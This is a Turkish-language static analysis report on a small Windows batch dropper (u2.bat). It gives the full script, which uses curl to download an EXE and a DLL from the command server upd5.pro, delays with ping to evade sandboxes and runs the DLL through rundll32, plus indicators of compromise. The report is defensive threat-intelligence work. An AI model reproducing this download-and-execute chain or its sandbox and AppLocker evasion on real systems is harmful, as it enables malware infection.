Statik Analiz — BAT Dropper (u2.bat) | Tehdit: YUKSEK
Dosya Kimliği
| SHA256 | 3b3bd81232f517ba6d65c7838c205b301b0f27572fcfef9e5b86dd30a1d55a0d |
|---|---|
| Dosya Adı | u2.bat ("update 2" — numaralı kampanya bileşeni) |
| Boyut | 326 byte (minimal dropper — sadece eylem komutları) |
| Tür | Windows Batch Script (.bat) |
Tam Kaynak Kodu (326 byte)
MINİMAL DROPPER: 326 byte'ta tam enfeksiyon zinciri!
@echo off echo "-> Loading update 2 tool..." curl -o qd_x86.exe https://upd5.pro/update/qd_x86.exe curl -o 02.dll https://upd5.pro/update/02.dll ping -n 5 localhost > nul echo "-> Loading update 2..." rundll32.exe 02.dll,checkit echo "-> Done."
upd5.pro: C2 Dağıtım Sunucusu
C2 DOMAIN: upd5.pro — "update 5 pro" kampanya altyapısı!
upd5.pro -- "upd5" = "update" + "5": numaralı güncelleme sunucusu - u2.bat = "update 2" dropper - upd5.pro = "update 5 pro" dağıtım sunucusu - Kampanya altyapısı: farklı numaralı araçlar için farklı numara şeması -- ".pro" TLD: düşük maliyetli ve az izlenen TLD -- Payload URL'leri: https://upd5.pro/update/qd_x86.exe → ana payload (x86 yürütülebilir) https://upd5.pro/update/02.dll → DLL bileşen (02 = numara 2?) -- "update" klasörü: meşru güncelleme sunucusu taklidi
curl -o qd_x86.exe / 02.dll: Payload İndirme
curl -o qd_x86.exe https://upd5.pro/update/qd_x86.exe
curl -o 02.dll https://upd5.pro/update/02.dll
-- curl: Windows 10+ dahili araç (Living off the Land — PowerShell gerekmez)
-- qd_x86.exe: 32-bit yürütülebilir ("qd" = belirsiz kısaltma — dropper veya loader)
-- 02.dll: numaralı DLL bileşen (02 = 2. bileşen)
-- İki aşamalı indirme: hem EXE hem DLL ayrı indirilir → modüler yapı
-- EXE çalıştırılmıyor doğrudan: sadece DLL rundll32 ile yükleniyor
-- EXE olası rolü: DLL'i side-load etmek veya ikincil bileşen
ping -n 5 localhost: Anti-Sandbox Geciktirme Hilesi
ping -n 5 localhost > nul -- "ping localhost" = loopback ping → ağ bağlantısı gerekmez, garanti çalışır -- "-n 5" = 5 ping paketi → ~5 saniye gecikme (her ping ~1 saniye) -- "> nul" = tüm çıktıyı bastır (sessiz) -- Sandbox bypass tekniği: - Bazı sandbox'lar "sleep" benzeri beklemeleri atlar - ping komutu: OS'un ağ yığınından → atlayamıyorlar - İndirilen dosyaların diske yazılmasını bekle (disk I/O gecikme) - curl indirmeleri tamamlanmadan rundll32 çalıştırmayı önle -- Alternatif: "ping 192.0.2.2 -w 5000" (RFC5737 TEST-NET) — daha etkili
rundll32.exe 02.dll,checkit: DLL Export Çalıştırma
rundll32.exe 02.dll,checkit -- rundll32: Windows dahili araç (AV beyaz listesinde) -- "02.dll": indirilen DLL → yerel dizine yazıldı -- "checkit": DLL içindeki export fonksiyon adı - Exports: `checkit` → malware asıl entry point'i - "checkit" adı: meşru araç taklidi yapıyor gibi görünüyor -- rundll32 ile DLL çalıştırma: AppLocker/SRP bypass tekniği - Kısıtlı ortamlar: rundll32'e izin verilen → DLL payload atlar -- 02.dll içeriği bilinmiyor (C2'den dinamik indiriliyor)
IOC
| SHA256 | 3b3bd81232f517ba6d65c7838c205b301b0f27572fcfef9e5b86dd30a1d55a0d |
|---|---|
| C2 | upd5.pro |
| URL 1 | https://upd5.pro/update/qd_x86.exe |
| URL 2 | https://upd5.pro/update/02.dll |
| DLL Export | 02.dll,checkit |
BATDropper — Malware Profile
BAT dropper u2.bat. upd5.pro C2 distribution server. curl download qd_x86.exe + 02.dll. rundll32.exe 02.dll,checkit DLL export execution. ping -n 5 localhost sandbox delay.
Malware Type
Loader
Programming Language
Batch Script
C2 Protocol
HTTPS
Target Systems
Küresel
Capabilities & Behavior
Payload İndirme
Süreç Enjeksiyonu
Modüler Mimari
Kimlik Bilgisi Hırsızlığı
Yanal Hareket
Kalıcılık
Anti-VM/Sandbox
İkincil Payload Dağıtımı
IOC List (2 indicators)
IOC — BATDropper
# SHA256
3b3bd81232f517ba6d65c7838c205b301b0f27572fcfef9e5b86dd30a1d55a0d
# SHA256
3b3bd81232f517ba6d65c7838c205b301b0f27572fcfef9e5b86dd30a1d55a0d
| Type | Value | Note |
|---|---|---|
| sha256 | 3b3bd81232f517ba6d65c7838c205b301b0f27572fcfef9e5b86dd30a1d55a0d | |
| sha256 | 3b3bd81232f517ba6d65c7838c205b301b0f27572fcfef9e5b86dd30a1d55a0d |